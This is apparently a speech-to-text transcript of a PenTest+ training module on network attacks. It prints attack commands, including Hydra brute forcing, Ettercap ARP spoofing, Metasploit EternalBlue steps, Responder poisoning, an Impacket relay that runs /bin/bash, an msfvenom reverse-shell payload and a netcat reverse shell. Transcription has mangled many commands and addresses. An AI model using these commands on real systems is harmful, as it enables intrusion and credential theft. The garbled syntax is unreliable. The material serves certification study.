In this module, we'll delve into the intriguing realm of network attacks, an essential part of the CompTIA PenTest plus PT0-003 certification. We'll start with an overview, where we'll discuss what network attacks are and why they are crucial in penetration testing. Understanding these attacks is fundamental because it arms you with the ability to anticipate and mitigate potential threats effectively. Now, onto our next slide. We'll dive deeper into the various types of network attacks. Familiarity with these different attack types is critical, as it enables you to both recognize and perform them efficiently during your penetration testing engagements. Let's move forward and explore the spectrum of network attacks you need to be aware of. In the previous slide, we introduced the concept of network attacks within the context of penetration testing, emphasizing the importance of understanding and performing these attacks to identify potential vulnerabilities in network defenses. Now let's dive into the various types of network attacks. Recognizing and categorizing different attack types is crucial for a penetration tester. Each type has its own methods, tools, and potential impacts, which we need to be familiar with to properly assess and secure network environments. Understanding these attack types not only helps in the identification and exploitation of vulnerabilities, but also in tailoring security measures to mitigate specific threats. By recognizing the attack patterns and methods, we can better prepare and defend against potential breaches. In our next slide, we'll go into the specifics of default credentials. We'll discuss what default credentials are, the risks associated with them, and demonstrate techniques for discovering and exploiting these vulnerabilities using tools like Hydra. Stay tuned as we delve deeper into the practical aspects of handling default credentials and improving network security. In the previous slide, we introduced various types of network attacks and discussed the importance of recognizing and performing different attack types. Now, let's dive into a specific type of attack related to weak security practices: default credentials. On this slide, we'll cover what default credentials are, the risks associated with using them, and techniques for discovering and exploiting these vulnerabilities. Default credentials are the factory-set usernames and passwords that come with many devices and software. These are meant to be changed upon initial setup, but often users neglect to do so, leaving systems vulnerable. The risks are significant. Attackers can easily find these default credentials published online, allowing them to gain unauthorized access to systems and networks. One common technique for discovering and exploiting default credentials is brute forcing. For example, tools like Hydra can automate this process. In the command shown here, Hydra L usernames.txt-p passwords.txt 192.168.1.10 SSH. Hydra attempts to log in to an SSH server running on 192.168.1.10 using a list of potential usernames and passwords found in usernames.txt and passwords.txt. Moving on, in the next slide, we'll discuss on-path attacks, or what is also known as man-in-the-middle, MITM, attacks. This attack type involves intercepting and manipulating communications between two parties. We'll explore its definition, impact, and techniques, including a practical example using EtherCap to perform an ARP spoofing attack. Continuing from our previous discussion on default credentials, let's now delve into on-path attacks, also commonly known as man-in-the-middle attacks. On-path attacks involve intercepting and potentially altering the communication between two parties without their knowledge. These attacks can be particularly devastating because they allow the attacker to capture sensitive data, manipulate information, and inject malicious content into the communication stream. To perform an on-path attack, various techniques can be employed, with ARP spoofing being one of the most prevalent. By redirecting network traffic to the attacker's machine, an adversary can eavesdrop or inject malicious packets unnoticed. For example, we can use EtherCap, a popular network security tool, to execute an on-path attack through ARP spoofing. The command provided here, ethercap-t q-ieth0-mart.168.1.1/192.168.1.10. This command tells EtherCap to target the devices with IP addresses 192.168.1.1 and 192.168.1.10 on the network interface ETH0. This type of attack can effectively intercept and manipulate data between these two devices. By understanding and utilizing these techniques, we can highlight the importance of securing communication channels and the necessity for network defenses like encryption and authentication to mitigate such risks. Next, we'll move on to certificate services exploitation, exploring why certificate services are crucial for network security and how misconfigurations can be exploited using tools such as CertiPy. In this slide, we'll be shifting our focus from on-path attacks to the exploitation of certificate services, which is a crucial aspect of network security. Certificate services play a significant role in ensuring secure communications within a network by verifying the identities of the entities involved. When these services are misconfigured, they can become a gateway for attackers to gain unauthorized access. One commonly used tool for exploiting misconfigured certificate services is CertiPy. With CertiPy, an attacker can locate and exploit vulnerabilities within Active Directory certificate services. For instance, by running the command bash certipy find dcap 192.168.10.user p password -d domain, the attacker attempts to find misconfigurations on the certificate services targeting the specified domain controller IP address using provided user credentials. In essence, a misconfigured certificate service can undermine the entire security framework of a network, making it imperative for administrators to continually audit and secure these services. On the next slide, we'll delve into the exploitation of misconfigured services more broadly, discussing the risks they pose, techniques to identify and exploit them, and a practical example using Metasploit. Let's continue. On the previous slide, we discussed the significance of certificate services in network security and demonstrated how tools like CertiPy can exploit misconfigured Active Directory certificate services using specific command line examples. Now, moving on to slide 6, we are shifting our focus to misconfigured services exploitation. Misconfigured services pose a considerable risk to network security as they can be easily exploited by attackers to gain unauthorized access or control over systems. One of the essential steps in this process is identifying vulnerabilities within these services. Tools like Metasploit can be incredibly useful for this purpose. For instance, if we know a particular service on a machine is vulnerable, we can use Metasploit to exploit it. An example of this is exploiting the Eternal Blue vulnerability on a Windows machine. Here's how. 1. Load the appropriate exploit module in Metasploit using the command use exploit windows smb/ms17-01 Eternal Blue. 2. Set the target host or roast to the IP address of the target machine. Set roast 192.168.1.10. 3. Finally, initiate the exploit process. Exploit. This exploitation can potentially lead to gaining unauthorized access and control over the target system, which is why it's critical to ensure all services are properly configured and regularly updated. In the next slide, we'll delve into the concept of VLAN hopping, discussing its definition, inherent risks, and how attackers can perform such attacks using tools like Yersinia. Next, let's discuss VLAN hopping. VLAN hopping is a type of network attack where an attacker manipulates VLAN tags to gain unauthorized access to other VLANs within a network. This can lead to serious security risks, including unauthorized data access and lateral movement across the network. To carry out a VLAN hopping attack, one common technique is double tagging, where an attacker inserts 2 VLAN tags into the frames they send. The first VLAN tag is used to reach the target VLAN, while the second VLAN tag helps the attacker break out of the initial VLAN to access another. Another technique involves forging DTP, dynamic trunking protocol packets to negotiate a trunk link, which grants the attacker access to multiple VLANs. For instance, Yersinia is a network tool that can be used to perform various network attacks, including VLAN hopping. To initiate a VLAN hopping attack using Yersinia, you can start Yersinia with the command Yersinia I. This will open an interactive mode where you can perform and test VLAN hopping and other network attacks. Understanding the techniques and tools involved in VLAN hopping is crucial for better securing network infrastructures against such attacks. Now, let's move to the next topic, multi-homed hosts. Slide 8, multi-homed hosts. Now moving on to multi-homed hosts. A multi-homed host is a system that has multiple network interfaces, which allows it to connect to different networks simultaneously. While this can be useful for redundancy and performance, it also introduces certain security risks. The primary risk is that these hosts can be used to bridge otherwise isolated networks, potentially bypassing security controls. For an attacker, exploiting a multi-homed host can provide a pathway to pivot from one network segment to another, essentially hopping across different network zones that should ideally remain separate. One effective technique for exploiting multi-homed hosts involves the use of Netcat, a versatile networking utility. By setting up a listener on one of the network interfaces of the compromised multi-homed host, an attacker can then use this as a pivot point to relay traffic from and to different network segments. For example, executing NC-LVP4444 on the multi-homed host will set up a listener on port 44444. Once the listener is active, the attacker can tunnel their traffic through the compromised host, creating a bridge between the networks and subsequently expanding their reach within the target environment. In summary, while multi-homed hosts can offer enhanced connectivity and redundancy, they also present a significant risk vector if not properly secured. Next up, we'll delve into relay attacks, where we'll explore how attackers can exploit network communications to perform man-in-the-middle attacks. On the previous slide, we delved into multi-homed hosts, defining what they are, discussing their associated risks, and exploring various techniques for exploiting them. A practical example we discussed is using Netcat to pivot through a multi-homed host, where we use the command NC-LVP4444 to establish a listening port. Now let's move on to slide 9, which focuses on relay attacks. Relay attacks involve intercepting and relaying authentication requests between a client and server, effectively allowing the attacker to masquerade as both parties without knowing the actual credentials. These attacks can have significant impacts, potentially leading to unauthorized access and lateral movement within the network. We'll look into techniques for performing these relay attacks, and as an example, we'll use the tool Responder to perform an SMB relay attack. The command for this example is responder-i eth0-rpv, where we specify the network interface with -i, enable the SMB relay module with -r, and activate the poisoners with -pv. Moving forward, the next slide will cover share enumeration, underscoring its importance in network attacks and examining various techniques to enumerate network shares. We will also see a practical example using crackmap-exec for share enumeration with the command crackmap-exec smb192.168.1.0/24-shares. Let's stay focused on relay attacks for now and understand their methodologies and the practical application via the Responder tool. On this slide, we will delve into the crucial topic of share enumeration in network attacks. First, let's understand the importance of share enumeration. In a network attack, identifying shared resources such as files, folders, and printers can provide an attacker with insights into the network structure and potential access points. By enumerating shares, attackers can uncover sensitive data, misconfigurations, and potential vulnerabilities that may be exploited later in their attack chain. Now moving on to techniques for enumerating network shares. There are several methods and tools available for this purpose. One powerful tool that we'll be focusing on today is crackmap-exec. Crackmap-exec is a versatile post-exploitation tool that allows us to enumerate SMB shares across a range of IP addresses quickly. Let's look at an example command to enumerate network shares using crackmap-exec. crackmap-exec smb 192.168.1.0/24 shares. In this command, SMB specifies the protocol, 192.168.1.24 defines the target subnet, and -shares instructs crackmap-exec to list the available SMB shares on the target network. This command will provide us with a comprehensive list of shares accessible within the specified subnet, which can be extremely useful for planning further attacks. By leveraging share enumeration, attackers can gather critical information that aids in lateral movement and privilege escalation within a network. Understanding and utilizing these techniques can significantly enhance your penetration testing and security assessment methodologies. In the next slide, we will explore packet crafting, where we will define its purpose and discuss how to craft and send custom packets using Scapy. In the previous slides, we discussed share enumeration, which is a critical first step in network attacks. We covered its importance, various techniques for enumerating network shares, and walked through a practical example using the tool Nmap exec. Now, shifting our focus to slide 11, packet crafting. Here, we're diving into the art and science of packet crafting. Packet crafting involves creating bespoke packets for testing and exploiting network protocols. This technique is essential for penetration testers to understand how networks behave under various conditions and to uncover vulnerabilities. One powerful tool for this is Scapy, a Python-based library. With Scapy, we can easily craft and send custom packets. For example, in the code snippet provided, we use Scapy to create an IP packet with a destination address of 192.160.1.10 and attach a TCP segment directed to port 80. This is a fundamental way to simulate web traffic to a target host. If we run this script, Python from scapy.all, import power packet equals ipdst equal 192.168.1.10 /TCP80 send packet, it sends a crafted TCP packet, paving the way for deeper packet level analysis or testing specific responses from the target. In the following slide, we'll give an overview of the various tools at your disposal for network attacks, highlighting the importance of selecting the right tools depending on the attack type. On this slide, we're moving on from packet crafting to discuss the various tools used for network attacks. Our primary focus is to provide an overview of these tools, emphasizing their unique capabilities and applications. Selecting the right tool is crucial for the success of specific attack types. This slide will help you understand the landscape of tools available and how to choose the most effective one for your objectives. Up next, we'll delve into one of the most popular and versatile tools in network security, Metasploit. We'll cover its features, demonstrate techniques for leveraging it in network attacks, and walk through an example of exploiting a service using the framework. So let's move on and explore Metasploit in detail. As we move ahead, let's focus on one of the most versatile tools in the realm of network attacks, Metasploit. The Metasploit framework serves as an invaluable asset for penetration testers and attackers alike. It allows users to exploit vulnerabilities and further understand the various security weaknesses within a network. When using Metasploit, there are several techniques to be aware of. A common use case involves exploiting a particular service vulnerability. For instance, here's an example of exploiting a known Windows vulnerability, MS170110, also known as Eternal Blue. Firstly, you'd use the exploit module designed for this vulnerability. Bash use exploit Windows SMB/MS1701 Eternal Blue. Then, you would set the target host address, bash set rhost 192.168.1.10. And finally, execute the exploit, bash exploit. By doing this, Metasploit will attempt to exploit the SMB service on the targeted machine located at 192.168.1.10 using the Eternal Blue vulnerability. In the next slide, we'll discuss another essential tool, Netcat. It plays a critical role in network attacks, particularly useful for creating reverse shells. Now that we've covered Metasploit in depth, including its framework, various techniques for network attacks, and even how to exploit a service using the tool, let's move on to another essential utility in your penetration testing kit, Netcat. Netcat, often referred to as the Swiss Army knife of networking, is a versatile tool that can read and write data across network connections using the TCP or UDP protocols. It can be used for a multitude of purposes, such as port scanning, transferring files, and creating backdoors. Here, we'll focus on one of the most common uses of Netcat, setting up a reverse shell. A reverse shell is a great way to establish persistent access to a target system. Let's look at a quick example. The command nc-bin bash 192.168.1.10.4444 essentially tells Netcat to execute /bin bash and connect back to 192.168.10 on port 44444. This command is executed on the compromised machine, initiating the connection to the attacker's machine. In the next slide, we'll dive into Nmap and its powerful scripting engine, NSE, which allows for detailed vulnerability scanning and much more. Building from our previous discussion on Netcat and how it can be utilized for network attacks, including setting up a reverse shell, let's transition into another critical tool, Nmap. As you see in the current slide, we'll be focusing on the Nmap network scanner and its powerful counterpart, the Nmap scripting engine, NSE. Nmap, short for Network Mapper, is an open-source tool designed for network discovery and security auditing. It's highly effective for tasks like network inventory, managing service upgrade schedules, and monitoring host or service uptime. The Nmap scripting engine extends Nmap's capabilities by allowing users to write scripts using the Lua programming language, enabling custom functions and complex automation that enhance scanning processes. This can include tasks such as vulnerability detection, backdoor detection, and network policy compliance checks. An example of using NSE for vulnerability scanning is shown in the slide. Nmap script vuln 192.168.1.10. This command initiates a scan on the host specified, 192.168.1.10, and applies all vulnerability-related scripts available in the Nmap library. This can help identify potential weaknesses in your network that an attacker might exploit. As we move forward, we will examine another tool, Impacket, and how it can be used for SMB relay attacks, providing us with a deeper understanding of various techniques attackers might employ. Continuing from our exploration of the Nmap and Nmap scripting engine, let's turn our attention now to another powerful toolkit, Impacket. Impacket is a collection of Python classes for working with network protocols, and it's incredibly useful for a variety of network attack techniques. This toolkit includes several tools and scripts that allow for complex network interactions, often used for tasks such as relaying credentials and executing specific commands on remote systems. For example, one common technique using Impacket is a server message block (SMB) relay attack. Generally, this involves intercepting authentication attempts on a network and relaying them to another machine to gain unauthorized access. Let's look at an actual command you could use. Impacket-SMB relayx h192.168.1.10-e/bin bash. This command effectively attempts an SMB relay attack targeting 192.168.1.10, and if successful, it will execute /bin bash on the victim machine. Moving on, in the next slide, we will discuss CrackMapExec CME, another robust tool that simplifies the process of network reconnaissance and post-exploitation. Stay tuned as we dive deeper into how you can leverage CME for credential validation in network security assessments. In the previous slide, we discussed the Impacket toolkit, particularly its usefulness in network attacks such as SMB relay attacks. The command example we presented was Impacket SMB relayx h192.168.10-e/bin bash, which demonstrates how to use Impacket to execute a shell on a target machine. Moving on to our current slide, we will focus on another powerful tool in our arsenal, CrackMapExec, commonly abbreviated as CME. CrackMapExec is a versatile post-exploitation tool that can be used for various network attack techniques. It is especially useful for credential validation, helping attackers to verify if the given username and password combinations are valid across a network. For instance, using the command crackmapexec smb 192.168.1.24-u user password, CME will attempt to authenticate with the provided credentials across the specified subnet range, in this case, 192.168.1024. This enables attackers to quickly ascertain the legitimacy of credentials, which can then be leveraged for further exploitation activities. In the next slide, we will dive into Wireshark and TCP dump, focusing on how they can be used to capture and analyze network traffic. We'll also provide an example showing how to capture network traffic using the command tcpdump.ieth0-w capture.pcap. Continuing from our previous discussion on CrackMapExec, let's move on to slide 18, where we will explore two critical tools for network traffic analysis, Wireshark and TCP dump. Wireshark and TCP dump overview. Wireshark is a well-known, feature-rich tool for analyzing network traffic. It provides deep inspection of hundreds of protocols and live capture and offline analysis. TCP dump, on the other hand, is a command-line packet analyzer that allows users to capture or filter packet data within a network. Techniques for using Wireshark and TCP dump in network attacks. While both tools serve legitimate network analysis purposes, they can also be exploited by attackers to monitor and capture data flowing through a network. For instance, an attacker might use these tools to intercept sensitive information like passwords or other credentials. Example, capturing network traffic with TCP dump. Now, let's look at a command for capturing network traffic using TCP dump. Bash TCP dump -I eth0-w capture.psap. This command will capture all packets from the network interface eth0 and write them to a file named capture.psap. This file can be later analyzed with Wireshark to examine the packet data in detail. Next, we'll dive into the MSFVenom tool on slide 19. Here, we'll cover the use of MSFvenom for generating payloads, specifically focusing on creating a reverse shell payload. Continuing from our discussion on network traffic analysis tools like Wireshark and TCP dump, let's delve into MSFvenom, which is the focus of slide 19. MSFvenom is a versatile payload generation tool that integrates seamlessly with the Metasploit framework. It allows attackers to create payloads that can be delivered to target systems through various exploits. We'll cover some of the techniques you can employ using MSFvenom for network attacks, helping you understand how to craft payloads that can bypass defenses and give you control over compromised machines. One of the primary uses of MSFvenom is generating reverse shell payloads. A reverse shell is a type of shell where the target machine initiates a connection back to the attacker's machine, making it easier to overcome firewalls and NAT. Here's an example command to generate a reverse shell payload. MSFvenom-p windows/meterpreter/reverse TCP lhost equals 1.10 lp = 4444-f. Breaking this down, -p specifies the payload type. Windows/meterpreter/reverse TCP is our chosen reverse shell payload. lhost is the local host IP address where the reverse connection will be sent, and lport is the local port that will be used to listen for the incoming connection. The bash f flag indicates the format of the payload, which can be set to various types such as exe, raw, or even shellcode. Next, we'll explore the responder tool, which you'll find on slide 20. This tool is highly effective for LLMNR and NBTNS poisoning, integral components of network attacks that can be useful for capturing sensitive data like credentials over a network. Stay tuned for detailed techniques and example commands to put Responder into action. Now, let's move on to another essential tool for network penetration testing, Responder. In this slide, we will cover an overview of the Responder tool, some techniques for using it in network attacks, and an example of using Responder for LLMNR and NBTNS poisoning. Responder is a powerful tool for network reconnaissance and exploitation, mainly targeting the Windows network environment. It can capture and analyze network broadcast and multicast traffic, which often contains unencrypted credentials that can be exploited. One of the most effective techniques with Responder is LLMNR, Link Local Multicast Name Resolution, and NBTNS, NetBIOS Name Service, poisoning. These protocols are designed for host name resolution in Windows networks, but they are susceptible to manipulation. By exploiting these weaknesses, Responder can trick network devices into sending authentication credentials to the attacker's machine. Let's walk through an example of using Responder to demonstrate this attack. Here's the command, responder-i eth0. This command initiates Responder on the network interface eth0. Once activated, Responder listens for LLMNR and NBTNS requests on the network and responds to them, capturing any credentials sent by unsuspecting clients. In the next slide, we'll delve into Hydra, a tool for password cracking, showing how to use it for SSH brute force attacks. In this slide, we are shifting our focus to Hydra, a powerful password cracking tool. We'll start with an overview of Hydra, which is widely used by penetration testers for its versatility in attacking various network services. Next, we'll delve into techniques for effectively using Hydra in network attacks. Hydra can target multiple protocols such as FTP, HTTP, and SSH, making it immensely powerful in trying to gain unauthorized access. For our practical example, we'll demonstrate how to use Hydra for SSH brute force attacks. The example command provided here is hydra-ll usernames.txt-p passwords.txt 192.168.110 SSH. With this command, Hydra will attempt to brute force the SSH service on the IP address 192.168.1.10 using a list of usernames and passwords. In the next and final slide, we will be summarizing all the network attack techniques and tools we have discussed throughout the course. We will also highlight the significance of practicing and mastering these techniques to ensure successful penetration testing and discuss the next steps for further learning. Let's summarize what we've learned in this course. We've covered a range of network attack techniques and tools, including Hydra for password cracking. We've walked through an example of using Hydra to conduct an SSH brute force attack, which helped demonstrate its practical application in penetration testing. It's vital to practice and master these techniques to carry out successful penetration testing. This ensures that you can thoroughly assess and mitigate security vulnerabilities within the network. As for next steps, continue honing your skills by experimenting with a variety of tools and scenarios. Consider delving deeper into advanced penetration testing subjects and staying updated with the latest cybersecurity trends. This continuous learning approach will significantly enhance your capabilities as a penetration tester. Thank you for joining, and I hope you found this course enlightening.